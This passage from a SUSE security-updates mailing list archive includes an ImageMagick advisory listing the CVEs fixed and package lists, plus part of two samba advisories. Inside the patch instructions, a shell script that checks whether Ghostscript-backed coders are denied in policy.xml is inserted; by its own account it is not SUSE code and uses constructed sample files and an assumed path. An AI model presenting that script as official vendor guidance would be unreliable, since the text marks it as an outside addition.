      libsamba-hostconfig0-32bit-4.6.16+git.154.2998451b912-3.40.3
      libsamba-hostconfig0-4.6.16+git.154.2998451b912-3.40.3
      libsamba-hostconfig0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3
      libsamba-hostconfig0-debuginfo-4.6.16+git.154.2998451b912-3.40.3
      libsamba-passdb0-32bit-4.6.16+git.154.2998451b912-3.40.3
      libsamba-passdb0-4.6.16+git.154.2998451b912-3.40.3
      libsamba-passdb0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3
      libsamba-passdb0-debuginfo-4.6.16+git.154.2998451b912-3.40.3
      libsamba-util0-32bit-4.6.16+git.154.2998451b912-3.40.3
      libsamba-util0-4.6.16+git.154.2998451b912-3.40.3
      libsamba-util0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3
      libsamba-util0-debuginfo-4.6.16+git.154.2998451b912-3.40.3
      libsamdb0-32bit-4.6.16+git.154.2998451b912-3.40.3
      libsamdb0-4.6.16+git.154.2998451b912-3.40.3
      libsamdb0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3
      libsamdb0-debuginfo-4.6.16+git.154.2998451b912-3.40.3
      libsmbclient0-32bit-4.6.16+git.154.2998451b912-3.40.3
      libsmbclient0-4.6.16+git.154.2998451b912-3.40.3
      libsmbclient0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3
      libsmbclient0-debuginfo-4.6.16+git.154.2998451b912-3.40.3
      libsmbconf0-32bit-4.6.16+git.154.2998451b912-3.40.3
      libsmbconf0-4.6.16+git.154.2998451b912-3.40.3
      libsmbconf0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3
      libsmbconf0-debuginfo-4.6.16+git.154.2998451b912-3.40.3
      libsmbldap0-32bit-4.6.16+git.154.2998451b912-3.40.3
      libsmbldap0-4.6.16+git.154.2998451b912-3.40.3
      libsmbldap0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3
      libsmbldap0-debuginfo-4.6.16+git.154.2998451b912-3.40.3
      libtevent-util0-32bit-4.6.16+git.154.2998451b912-3.40.3
      libtevent-util0-4.6.16+git.154.2998451b912-3.40.3
      libtevent-util0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3
      libtevent-util0-debuginfo-4.6.16+git.154.2998451b912-3.40.3
      libwbclient0-32bit-4.6.16+git.154.2998451b912-3.40.3
      libwbclient0-4.6.16+git.154.2998451b912-3.40.3
      libwbclient0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3
      libwbclient0-debuginfo-4.6.16+git.154.2998451b912-3.40.3
      samba-4.6.16+git.154.2998451b912-3.40.3
      samba-client-32bit-4.6.16+git.154.2998451b912-3.40.3
      samba-client-4.6.16+git.154.2998451b912-3.40.3
      samba-client-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3
      samba-client-debuginfo-4.6.16+git.154.2998451b912-3.40.3
      samba-debuginfo-4.6.16+git.154.2998451b912-3.40.3
      samba-debugsource-4.6.16+git.154.2998451b912-3.40.3
      samba-libs-32bit-4.6.16+git.154.2998451b912-3.40.3
      samba-libs-4.6.16+git.154.2998451b912-3.40.3
      samba-libs-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3
      samba-libs-debuginfo-4.6.16+git.154.2998451b912-3.40.3
      samba-winbind-32bit-4.6.16+git.154.2998451b912-3.40.3
      samba-winbind-4.6.16+git.154.2998451b912-3.40.3
      samba-winbind-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3
      samba-winbind-debuginfo-4.6.16+git.154.2998451b912-3.40.3

   - SUSE Linux Enterprise Desktop 12-SP3 (noarch):

      samba-doc-4.6.16+git.154.2998451b912-3.40.3

   - SUSE Linux Enterprise Desktop 12-SP3 (x86_64):

      libdcerpc-binding0-32bit-4.6.16+git.154.2998451b912-3.40.3
      libdcerpc-binding0-4.6.16+git.154.2998451b912-3.40.3
      libdcerpc-binding0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3
      libdcerpc-binding0-debuginfo-4.6.16+git.154.2998451b912-3.40.3
      libdcerpc0-32bit-4.6.16+git.154.2998451b912-3.40.3
      libdcerpc0-4.6.16+git.154.2998451b912-3.40.3
      libdcerpc0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3
      libdcerpc0-debuginfo-4.6.16+git.154.2998451b912-3.40.3
      libndr-krb5pac0-32bit-4.6.16+git.154.2998451b912-3.40.3
      libndr-krb5pac0-4.6.16+git.154.2998451b912-3.40.3
      libndr-krb5pac0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3
      libndr-krb5pac0-debuginfo-4.6.16+git.154.2998451b912-3.40.3
      libndr-nbt0-32bit-4.6.16+git.154.2998451b912-3.40.3
      libndr-nbt0-4.6.16+git.154.2998451b912-3.40.3
      libndr-nbt0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3
      libndr-nbt0-debuginfo-4.6.16+git.154.2998451b912-3.40.3
      libndr-standard0-32bit-4.6.16+git.154.2998451b912-3.40.3
      libndr-standard0-4.6.16+git.154.2998451b912-3.40.3
      libndr-standard0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3
      libndr-standard0-debuginfo-4.6.16+git.154.2998451b912-3.40.3
      libndr0-32bit-4.6.16+git.154.2998451b912-3.40.3
      libndr0-4.6.16+git.154.2998451b912-3.40.3
      libndr0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3
      libndr0-debuginfo-4.6.16+git.154.2998451b912-3.40.3
      libnetapi0-32bit-4.6.16+git.154.2998451b912-3.40.3
      libnetapi0-4.6.16+git.154.2998451b912-3.40.3
      libnetapi0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3
      libnetapi0-debuginfo-4.6.16+git.154.2998451b912-3.40.3
      libsamba-credentials0-32bit-4.6.16+git.154.2998451b912-3.40.3
      libsamba-credentials0-4.6.16+git.154.2998451b912-3.40.3
      libsamba-credentials0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3
      libsamba-credentials0-debuginfo-4.6.16+git.154.2998451b912-3.40.3
      libsamba-errors0-32bit-4.6.16+git.154.2998451b912-3.40.3
      libsamba-errors0-4.6.16+git.154.2998451b912-3.40.3
      libsamba-errors0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3
      libsamba-errors0-debuginfo-4.6.16+git.154.2998451b912-3.40.3
      libsamba-hostconfig0-32bit-4.6.16+git.154.2998451b912-3.40.3
      libsamba-hostconfig0-4.6.16+git.154.2998451b912-3.40.3
      libsamba-hostconfig0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3
      libsamba-hostconfig0-debuginfo-4.6.16+git.154.2998451b912-3.40.3
      libsamba-passdb0-32bit-4.6.16+git.154.2998451b912-3.40.3
      libsamba-passdb0-4.6.16+git.154.2998451b912-3.40.3
      libsamba-passdb0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3
      libsamba-passdb0-debuginfo-4.6.16+git.154.2998451b912-3.40.3
      libsamba-util0-32bit-4.6.16+git.154.2998451b912-3.40.3
      libsamba-util0-4.6.16+git.154.2998451b912-3.40.3
      libsamba-util0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3
      libsamba-util0-debuginfo-4.6.16+git.154.2998451b912-3.40.3
      libsamdb0-32bit-4.6.16+git.154.2998451b912-3.40.3
      libsamdb0-4.6.16+git.154.2998451b912-3.40.3
      libsamdb0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3
      libsamdb0-debuginfo-4.6.16+git.154.2998451b912-3.40.3
      libsmbclient0-32bit-4.6.16+git.154.2998451b912-3.40.3
      libsmbclient0-4.6.16+git.154.2998451b912-3.40.3
      libsmbclient0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3
      libsmbclient0-debuginfo-4.6.16+git.154.2998451b912-3.40.3
      libsmbconf0-32bit-4.6.16+git.154.2998451b912-3.40.3
      libsmbconf0-4.6.16+git.154.2998451b912-3.40.3
      libsmbconf0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3
      libsmbconf0-debuginfo-4.6.16+git.154.2998451b912-3.40.3
      libsmbldap0-32bit-4.6.16+git.154.2998451b912-3.40.3
      libsmbldap0-4.6.16+git.154.2998451b912-3.40.3
      libsmbldap0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3
      libsmbldap0-debuginfo-4.6.16+git.154.2998451b912-3.40.3
      libtevent-util0-32bit-4.6.16+git.154.2998451b912-3.40.3
      libtevent-util0-4.6.16+git.154.2998451b912-3.40.3
      libtevent-util0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3
      libtevent-util0-debuginfo-4.6.16+git.154.2998451b912-3.40.3
      libwbclient0-32bit-4.6.16+git.154.2998451b912-3.40.3
      libwbclient0-4.6.16+git.154.2998451b912-3.40.3
      libwbclient0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3
      libwbclient0-debuginfo-4.6.16+git.154.2998451b912-3.40.3
      samba-4.6.16+git.154.2998451b912-3.40.3
      samba-client-32bit-4.6.16+git.154.2998451b912-3.40.3
      samba-client-4.6.16+git.154.2998451b912-3.40.3
      samba-client-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3
      samba-client-debuginfo-4.6.16+git.154.2998451b912-3.40.3
      samba-debuginfo-4.6.16+git.154.2998451b912-3.40.3
      samba-debugsource-4.6.16+git.154.2998451b912-3.40.3
      samba-libs-32bit-4.6.16+git.154.2998451b912-3.40.3
      samba-libs-4.6.16+git.154.2998451b912-3.40.3
      samba-libs-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3
      samba-libs-debuginfo-4.6.16+git.154.2998451b912-3.40.3
      samba-winbind-32bit-4.6.16+git.154.2998451b912-3.40.3
      samba-winbind-4.6.16+git.154.2998451b912-3.40.3
      samba-winbind-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3
      samba-winbind-debuginfo-4.6.16+git.154.2998451b912-3.40.3

   - SUSE Enterprise Storage 5 (aarch64 x86_64):

      ctdb-4.6.16+git.154.2998451b912-3.40.3
      ctdb-debuginfo-4.6.16+git.154.2998451b912-3.40.3
      samba-ceph-4.6.16+git.154.2998451b912-3.40.3
      samba-ceph-debuginfo-4.6.16+git.154.2998451b912-3.40.3
      samba-debuginfo-4.6.16+git.154.2998451b912-3.40.3
      samba-debugsource-4.6.16+git.154.2998451b912-3.40.3

References:

   https://www.suse.com/security/cve/CVE-2019-3880.html
   https://bugzilla.suse.com/1099590
   https://bugzilla.suse.com/1123755
   https://bugzilla.suse.com/1124223
   https://bugzilla.suse.com/1127153
   https://bugzilla.suse.com/1131060


From sle-security-updates at lists.suse.com  Thu Apr 25 10:15:42 2019
From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com)
Date: Thu, 25 Apr 2019 18:15:42 +0200 (CEST)
Subject: SUSE-SU-2019:1033-1: moderate: Security update for ImageMagick
Message-ID: <20190425161542.99F3DF3D3@maintenance.suse.de>

   SUSE Security Update: Security update for ImageMagick
______________________________________________________________________________

Announcement ID:    SUSE-SU-2019:1033-1
Rating:             moderate
References:         #1106989 #1106996 #1107609 #1120381 #1122033 #1124365
                    #1124366 #1124368 #1128649 #1130330 #1131317 #1132053
                    #1132054 #1132060
Cross-References:   CVE-2018-16412 CVE-2018-16413 CVE-2018-16644
                    CVE-2018-20467 CVE-2019-10650 CVE-2019-11007
                    CVE-2019-11008 CVE-2019-11009 CVE-2019-7175
                    CVE-2019-7395 CVE-2019-7397 CVE-2019-7398
                    CVE-2019-9956
Affected Products:
                    SUSE OpenStack Cloud 7
                    SUSE Linux Enterprise Workstation Extension 12-SP4
                    SUSE Linux Enterprise Workstation Extension 12-SP3
                    SUSE Linux Enterprise Software Development Kit 12-SP4
                    SUSE Linux Enterprise Software Development Kit 12-SP3
                    SUSE Linux Enterprise Server for SAP 12-SP2
                    SUSE Linux Enterprise Server 12-SP4
                    SUSE Linux Enterprise Server 12-SP3
                    SUSE Linux Enterprise Server 12-SP2-LTSS
                    SUSE Linux Enterprise Server 12-SP2-BCL
                    SUSE Linux Enterprise Server 12-SP1-LTSS
                    SUSE Linux Enterprise Server 12-LTSS
                    SUSE Linux Enterprise Desktop 12-SP4
                    SUSE Linux Enterprise Desktop 12-SP3
                    SUSE Enterprise Storage 4
______________________________________________________________________________

   An update that solves 13 vulnerabilities and has one fix is now available.

Description:

   This update for ImageMagick fixes the following issues:

   Security issues fixed:

   - CVE-2019-9956: Fixed a stack-based buffer overflow in PopHexPixel() (bsc#1130330).
   - CVE-2019-10650: Fixed a heap-based buffer over-read in WriteTIFFImage() (bsc#1131317).
   - CVE-2019-7175: Fixed multiple memory leaks in the DecodeImage() function (bsc#1128649).
   - CVE-2018-20467: Fixed an infinite loop in coders/bmp.c (bsc#1120381).
   - CVE-2019-7398: Fixed a memory leak in the function WriteDIBImage() (bsc#1124365).
   - CVE-2019-7397: Fixed a memory leak in the function WritePDFImage() (bsc#1124366).
   - CVE-2019-7395: Fixed a memory leak in the function WritePSDChannel() (bsc#1124368).
   - CVE-2018-16413: Fixed a heap-based buffer over-read in PushShortPixel() (bsc#1106989).
   - CVE-2018-16412: Fixed a heap-based buffer over-read in ParseImageResourceBlocks() (bsc#1106996).
   - CVE-2018-16644: Fixed a regression in the DCM coder (bsc#1107609).
   - CVE-2019-11007: Fixed a heap-based buffer overflow in ReadMNGImage() (bsc#1132060).
   - CVE-2019-11008: Fixed a heap-based buffer overflow in WriteXWDImage() (bsc#1132054).
   - CVE-2019-11009: Fixed a heap-based buffer over-read in ReadXWDImage() (bsc#1132053).

   Other changes:

   - Added extra -config- packages, one of which keeps the Postscript/EPS/PDF
     readers enabled. The PS decoders are removed by default to harden
     ImageMagick against security issues in Ghostscript, which ImageMagick
     calls to render those formats; enabling the decoders again exposes
     ImageMagick to such Ghostscript issues (bsc#1122033). Two packages can be
     selected:

     - ImageMagick-config-6-SUSE: PS decoders disabled.
     - ImageMagick-config-6-upstream: PS decoders enabled.

     Install either one, depending on your local needs. The default is the
     -SUSE configuration.

Patch Instructions:

   To install this SUSE Security Update use the SUSE recommended installation
   methods like YaST online_update or "zypper patch".
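   Which of the two configurations a host actually runs is decided by the
   coder policies in its policy.xml, not by the name of the installed
   -config- package alone. The script below is an added example (it is not
   part of this advisory and is not SUSE or ImageMagick code) that reads a
   policy.xml, lists every coder whose rights are "none", and checks that the
   Postscript-family coders are among them. The <policy domain="coder"
   rights="none" pattern="..."/> syntax is ImageMagick's real policy format;
   the two sample policy files the script writes are constructed for the
   example and are not the contents of the SUSE packages, and the path
   /etc/ImageMagick-6/policy.xml named in the note afterwards is assumed.

```sh
#!/bin/sh
# Added example, not SUSE or ImageMagick code: inspect an ImageMagick-6
# policy.xml and report whether the Ghostscript-backed coders are denied.

# Print the pattern of every coder-domain policy whose rights are "none".
# Attribute order inside the <policy> element is not assumed.
denied_coders() {
    grep -E '<policy[^>]*domain="coder"' "$1" \
        | grep -E 'rights="none"' \
        | sed -n 's/.*pattern="\([^"]*\)".*/\1/p'
}

# Succeed only if every coder named in $2.. is denied in policy file $1.
# Brace patterns such as "{PS,EPS,PDF}" are not expanded; name coders singly.
coders_denied() {
    policy="$1"; shift
    denied=$(denied_coders "$policy")
    for coder in "$@"; do
        if ! printf '%s\n' "$denied" | grep -qx "$coder"; then
            echo "coder $coder is NOT restricted in $policy" >&2
            return 1
        fi
    done
    return 0
}

# Constructed sample: the shape of a hardened policy in which the coders that
# ImageMagick hands to Ghostscript (PS, PS2, PS3, EPS, PDF, XPS) are denied.
HARDENED=$(mktemp)
cat > "$HARDENED" <<'EOF'
<policymap>
  <policy domain="resource" name="memory" value="256MiB"/>
  <policy domain="coder" rights="none" pattern="PS"/>
  <policy domain="coder" rights="none" pattern="PS2"/>
  <policy domain="coder" rights="none" pattern="PS3"/>
  <policy domain="coder" rights="none" pattern="EPS"/>
  <policy domain="coder" rights="none" pattern="PDF"/>
  <policy domain="coder" rights="none" pattern="XPS"/>
</policymap>
EOF

# Constructed sample: the shape of a policy that leaves the Postscript coders
# enabled and only restricts an unrelated coder.
UPSTREAM=$(mktemp)
cat > "$UPSTREAM" <<'EOF'
<policymap>
  <policy domain="resource" name="memory" value="256MiB"/>
  <policy domain="coder" rights="none" pattern="MVG"/>
</policymap>
EOF
trap 'rm -f "$HARDENED" "$UPSTREAM"' EXIT

for f in "$HARDENED" "$UPSTREAM"; do
    if coders_denied "$f" PS EPS PDF; then
        echo "$f: PS/EPS/PDF coders denied (hardened configuration)"
    else
        echo "$f: PS/EPS/PDF coders enabled (Ghostscript reachable from image input)"
    fi
done
```

   On a SUSE host, point coders_denied at the live file (assumed to be
   /etc/ImageMagick-6/policy.xml; confirm the path with
   "rpm -ql ImageMagick-config-6-SUSE") or compare its output with
   "convert -list policy", which prints the policy ImageMagick actually
   loaded. Installing the update itself is done with YaST online_update or
   "zypper patch" as stated above; the script only verifies the resulting
   configuration.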
   Alternatively you can run the command listed for your product:

   - SUSE OpenStack Cloud 7:

      zypper in -t patch SUSE-OpenStack-Cloud-7-2019-1033=1

   - SUSE Linux Enterprise Workstation Extension 12-SP4:

      zypper in -t patch SUSE-SLE-WE-12-SP4-2019-1033=1

   - SUSE Linux Enterprise Workstation Extension 12-SP3:

      zypper in -t patch SUSE-SLE-WE-12-SP3-2019-1033=1

   - SUSE Linux Enterprise Software Development Kit 12-SP4:

      zypper in -t patch SUSE-SLE-SDK-12-SP4-2019-1033=1

   - SUSE Linux Enterprise Software Development Kit 12-SP3:

      zypper in -t patch SUSE-SLE-SDK-12-SP3-2019-1033=1

   - SUSE Linux Enterprise Server for SAP 12-SP2:

      zypper in -t patch SUSE-SLE-SAP-12-SP2-2019-1033=1

   - SUSE Linux Enterprise Server 12-SP4:

      zypper in -t patch SUSE-SLE-SERVER-12-SP4-2019-1033=1

   - SUSE Linux Enterprise Server 12-SP3:

      zypper in -t patch SUSE-SLE-SERVER-12-SP3-2019-1033=1

   - SUSE Linux Enterprise Server 12-SP2-LTSS:

      zypper in -t patch SUSE-SLE-SERVER-12-SP2-2019-1033=1

   - SUSE Linux Enterprise Server 12-SP2-BCL:

      zypper in -t patch SUSE-SLE-SERVER-12-SP2-BCL-2019-1033=1

   - SUSE Linux Enterprise Server 12-SP1-LTSS:

      zypper in -t patch SUSE-SLE-SERVER-12-SP1-2019-1033=1

   - SUSE Linux Enterprise Server 12-LTSS:

      zypper in -t patch SUSE-SLE-SERVER-12-2019-1033=1

   - SUSE Linux Enterprise Desktop 12-SP4:

      zypper in -t patch SUSE-SLE-DESKTOP-12-SP4-2019-1033=1

   - SUSE Linux Enterprise Desktop 12-SP3:

      zypper in -t patch SUSE-SLE-DESKTOP-12-SP3-2019-1033=1

   - SUSE Enterprise Storage 4:

      zypper in -t patch SUSE-Storage-4-2019-1033=1

Package List:

   - SUSE OpenStack Cloud 7 (s390x x86_64):

      ImageMagick-config-6-SUSE-6.8.8.1-71.108.1
      ImageMagick-config-6-upstream-6.8.8.1-71.108.1
      ImageMagick-debuginfo-6.8.8.1-71.108.1
      ImageMagick-debugsource-6.8.8.1-71.108.1
      libMagickCore-6_Q16-1-6.8.8.1-71.108.1
      libMagickCore-6_Q16-1-debuginfo-6.8.8.1-71.108.1
      libMagickWand-6_Q16-1-6.8.8.1-71.108.1
      libMagickWand-6_Q16-1-debuginfo-6.8.8.1-71.108.1

   - SUSE Linux Enterprise Workstation Extension 12-SP4 (x86_64):

      ImageMagick-6.8.8.1-71.108.1
      ImageMagick-config-6-SUSE-6.8.8.1-71.108.1
      ImageMagick-config-6-upstream-6.8.8.1-71.108.1
      ImageMagick-debuginfo-6.8.8.1-71.108.1
      ImageMagick-debugsource-6.8.8.1-71.108.1
      libMagick++-6_Q16-3-6.8.8.1-71.108.1
      libMagick++-6_Q16-3-debuginfo-6.8.8.1-71.108.1
      libMagickCore-6_Q16-1-32bit-6.8.8.1-71.108.1
      libMagickCore-6_Q16-1-debuginfo-32bit-6.8.8.1-71.108.1

   - SUSE Linux Enterprise Workstation Extension 12-SP3 (x86_64):

      ImageMagick-6.8.8.1-71.108.1
      ImageMagick-config-6-SUSE-6.8.8.1-71.108.1
      ImageMagick-config-6-upstream-6.8.8.1-71.108.1
      ImageMagick-debuginfo-6.8.8.1-71.108.1
      ImageMagick-debugsource-6.8.8.1-71.108.1
      libMagick++-6_Q16-3-6.8.8.1-71.108.1
      libMagick++-6_Q16-3-debuginfo-6.8.8.1-71.108.1
      libMagickCore-6_Q16-1-32bit-6.8.8.1-71.108.1
      libMagickCore-6_Q16-1-debuginfo-32bit-6.8.8.1-71.108.1

   - SUSE Linux Enterprise Software Development Kit 12-SP4 (aarch64 ppc64le s390x x86_64):

      ImageMagick-6.8.8.1-71.108.1
      ImageMagick-debuginfo-6.8.8.1-71.108.1
      ImageMagick-debugsource-6.8.8.1-71.108.1
      ImageMagick-devel-6.8.8.1-71.108.1
      libMagick++-6_Q16-3-6.8.8.1-71.108.1
      libMagick++-6_Q16-3-debuginfo-6.8.8.1-71.108.1
      libMagick++-devel-6.8.8.1-71.108.1
      perl-PerlMagick-6.8.8.1-71.108.1
      perl-PerlMagick-debuginfo-6.8.8.1-71.108.1

   - SUSE Linux Enterprise Software Development Kit 12-SP3 (aarch64 ppc64le s390x x86_64):

      ImageMagick-6.8.8.1-71.108.1
      ImageMagick-debuginfo-6.8.8.1-71.108.1
      ImageMagick-debugsource-6.8.8.1-71.108.1
      ImageMagick-devel-6.8.8.1-71.108.1
      libMagick++-6_Q16-3-6.8.8.1-71.108.1
      libMagick++-6_Q16-3-debuginfo-6.8.8.1-71.108.1
      libMagick++-devel-6.8.8.1-71.108.1
      perl-PerlMagick-6.8.8.1-71.108.1
      perl-PerlMagick-debuginfo-6.8.8.1-71.108.1

   - SUSE Linux Enterprise Server for SAP 12-SP2 (ppc64le x86_64):

      ImageMagick-config-6-SUSE-6.8.8.1-71.108.1
      ImageMagick-config-6-upstream-6.8.8.1-71.108.1
      ImageMagick-debuginfo-6.8.8.1-71.108.1
      ImageMagick-debugsource-6.8.8.1-71.108.1
      libMagickCore-6_Q16-1-6.8.8.1-71.108.1
      libMagickCore-6_Q16-1-debuginfo-6.8.8.1-71.108.1
      libMagickWand-6_Q16-1-6.8.8.1-71.108.1
      libMagickWand-6_Q16-1-debuginfo-6.8.8.1-71.108.1

   - SUSE Linux Enterprise Server 12-SP4 (aarch64 ppc64le s390x x86_64):

      ImageMagick-config-6-SUSE-6.8.8.1-71.108.1
      ImageMagick-config-6-upstream-6.8.8.1-71.108.1
      ImageMagick-debuginfo-6.8.8.1-71.108.1
      ImageMagick-debugsource-6.8.8.1-71.108.1
      libMagickCore-6_Q16-1-6.8.8.1-71.108.1
      libMagickCore-6_Q16-1-debuginfo-6.8.8.1-71.108.1
      libMagickWand-6_Q16-1-6.8.8.1-71.108.1
      libMagickWand-6_Q16-1-debuginfo-6.8.8.1-71.108.1

   - SUSE Linux Enterprise Server 12-SP3 (aarch64 ppc64le s390x x86_64):

      ImageMagick-config-6-SUSE-6.8.8.1-71.108.1
      ImageMagick-config-6-upstream-6.8.8.1-71.108.1
      ImageMagick-debuginfo-6.8.8.1-71.108.1
      ImageMagick-debugsource-6.8.8.1-71.108.1
      libMagickCore-6_Q16-1-6.8.8.1-71.108.1
      libMagickCore-6_Q16-1-debuginfo-6.8.8.1-71.108.1
      libMagickWand-6_Q16-1-6.8.8.1-71.108.1
      libMagickWand-6_Q16-1-debuginfo-6.8.8.1-71.108.1

   - SUSE Linux Enterprise Server 12-SP2-LTSS (ppc64le s390x x86_64):

      ImageMagick-config-6-SUSE-6.8.8.1-71.108.1
      ImageMagick-config-6-upstream-6.8.8.1-71.108.1
      ImageMagick-debuginfo-6.8.8.1-71.108.1
      ImageMagick-debugsource-6.8.8.1-71.108.1
      libMagickCore-6_Q16-1-6.8.8.1-71.108.1
      libMagickCore-6_Q16-1-debuginfo-6.8.8.1-71.108.1
      libMagickWand-6_Q16-1-6.8.8.1-71.108.1
      libMagickWand-6_Q16-1-debuginfo-6.8.8.1-71.108.1

   - SUSE Linux Enterprise Server 12-SP2-BCL (x86_64):

      ImageMagick-config-6-SUSE-6.8.8.1-71.108.1
      ImageMagick-config-6-upstream-6.8.8.1-71.108.1
      ImageMagick-debuginfo-6.8.8.1-71.108.1
      ImageMagick-debugsource-6.8.8.1-71.108.1
      libMagickCore-6_Q16-1-6.8.8.1-71.108.1
      libMagickCore-6_Q16-1-debuginfo-6.8.8.1-71.108.1
      libMagickWand-6_Q16-1-6.8.8.1-71.108.1
      libMagickWand-6_Q16-1-debuginfo-6.8.8.1-71.108.1

   - SUSE Linux Enterprise Server 12-SP1-LTSS (ppc64le s390x x86_64):

      ImageMagick-config-6-SUSE-6.8.8.1-71.108.1
      ImageMagick-config-6-upstream-6.8.8.1-71.108.1
      ImageMagick-debuginfo-6.8.8.1-71.108.1
      ImageMagick-debugsource-6.8.8.1-71.108.1
      libMagickCore-6_Q16-1-6.8.8.1-71.108.1
      libMagickCore-6_Q16-1-debuginfo-6.8.8.1-71.108.1
      libMagickWand-6_Q16-1-6.8.8.1-71.108.1
      libMagickWand-6_Q16-1-debuginfo-6.8.8.1-71.108.1

   - SUSE Linux Enterprise Server 12-LTSS (ppc64le s390x x86_64):

      ImageMagick-config-6-SUSE-6.8.8.1-71.108.1
      ImageMagick-config-6-upstream-6.8.8.1-71.108.1
      ImageMagick-debuginfo-6.8.8.1-71.108.1
      ImageMagick-debugsource-6.8.8.1-71.108.1
      libMagickCore-6_Q16-1-6.8.8.1-71.108.1
      libMagickCore-6_Q16-1-debuginfo-6.8.8.1-71.108.1
      libMagickWand-6_Q16-1-6.8.8.1-71.108.1
      libMagickWand-6_Q16-1-debuginfo-6.8.8.1-71.108.1

   - SUSE Linux Enterprise Desktop 12-SP4 (x86_64):

      ImageMagick-6.8.8.1-71.108.1
      ImageMagick-config-6-SUSE-6.8.8.1-71.108.1
      ImageMagick-config-6-upstream-6.8.8.1-71.108.1
      ImageMagick-debuginfo-6.8.8.1-71.108.1
      ImageMagick-debugsource-6.8.8.1-71.108.1
      libMagick++-6_Q16-3-6.8.8.1-71.108.1
      libMagick++-6_Q16-3-debuginfo-6.8.8.1-71.108.1
      libMagickCore-6_Q16-1-32bit-6.8.8.1-71.108.1
      libMagickCore-6_Q16-1-6.8.8.1-71.108.1
      libMagickCore-6_Q16-1-debuginfo-32bit-6.8.8.1-71.108.1
      libMagickCore-6_Q16-1-debuginfo-6.8.8.1-71.108.1
      libMagickWand-6_Q16-1-6.8.8.1-71.108.1
      libMagickWand-6_Q16-1-debuginfo-6.8.8.1-71.108.1

   - SUSE Linux Enterprise Desktop 12-SP3 (x86_64):

      ImageMagick-6.8.8.1-71.108.1
      ImageMagick-config-6-SUSE-6.8.8.1-71.108.1
      ImageMagick-config-6-upstream-6.8.8.1-71.108.1
      ImageMagick-debuginfo-6.8.8.1-71.108.1
      ImageMagick-debugsource-6.8.8.1-71.108.1
      libMagick++-6_Q16-3-6.8.8.1-71.108.1
      libMagick++-6_Q16-3-debuginfo-6.8.8.1-71.108.1
      libMagickCore-6_Q16-1-32bit-6.8.8.1-71.108.1
      libMagickCore-6_Q16-1-6.8.8.1-71.108.1
      libMagickCore-6_Q16-1-debuginfo-32bit-6.8.8.1-71.108.1
      libMagickCore-6_Q16-1-debuginfo-6.8.8.1-71.108.1
      libMagickWand-6_Q16-1-6.8.8.1-71.108.1
      libMagickWand-6_Q16-1-debuginfo-6.8.8.1-71.108.1

   - SUSE Enterprise Storage 4 (x86_64):

      ImageMagick-config-6-SUSE-6.8.8.1-71.108.1
      ImageMagick-config-6-upstream-6.8.8.1-71.108.1
      ImageMagick-debuginfo-6.8.8.1-71.108.1
      ImageMagick-debugsource-6.8.8.1-71.108.1
      libMagickCore-6_Q16-1-6.8.8.1-71.108.1
      libMagickCore-6_Q16-1-debuginfo-6.8.8.1-71.108.1
      libMagickWand-6_Q16-1-6.8.8.1-71.108.1
      libMagickWand-6_Q16-1-debuginfo-6.8.8.1-71.108.1

References:

   https://www.suse.com/security/cve/CVE-2018-16412.html
   https://www.suse.com/security/cve/CVE-2018-16413.html
   https://www.suse.com/security/cve/CVE-2018-16644.html
   https://www.suse.com/security/cve/CVE-2018-20467.html
   https://www.suse.com/security/cve/CVE-2019-10650.html
   https://www.suse.com/security/cve/CVE-2019-11007.html
   https://www.suse.com/security/cve/CVE-2019-11008.html
   https://www.suse.com/security/cve/CVE-2019-11009.html
   https://www.suse.com/security/cve/CVE-2019-7175.html
   https://www.suse.com/security/cve/CVE-2019-7395.html
   https://www.suse.com/security/cve/CVE-2019-7397.html
   https://www.suse.com/security/cve/CVE-2019-7398.html
   https://www.suse.com/security/cve/CVE-2019-9956.html
   https://bugzilla.suse.com/1106989
   https://bugzilla.suse.com/1106996
   https://bugzilla.suse.com/1107609
   https://bugzilla.suse.com/1120381
   https://bugzilla.suse.com/1122033
   https://bugzilla.suse.com/1124365
   https://bugzilla.suse.com/1124366
   https://bugzilla.suse.com/1124368
   https://bugzilla.suse.com/1128649
   https://bugzilla.suse.com/1130330
   https://bugzilla.suse.com/1131317
   https://bugzilla.suse.com/1132053
   https://bugzilla.suse.com/1132054
   https://bugzilla.suse.com/1132060


From sle-security-updates at lists.suse.com  Thu Apr 25 16:09:04 2019
From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com)
Date: Fri, 26 Apr 2019 00:09:04 +0200 (CEST)
Subject: SUSE-SU-2019:1040-1: important: Security update for samba
Message-ID: <20190425220904.45C04F3DB@maintenance.suse.de>

   SUSE Security Update: Security update for samba
______________________________________________________________________________

Announcement ID:    SUSE-SU-2019:1040-1
Rating:             important
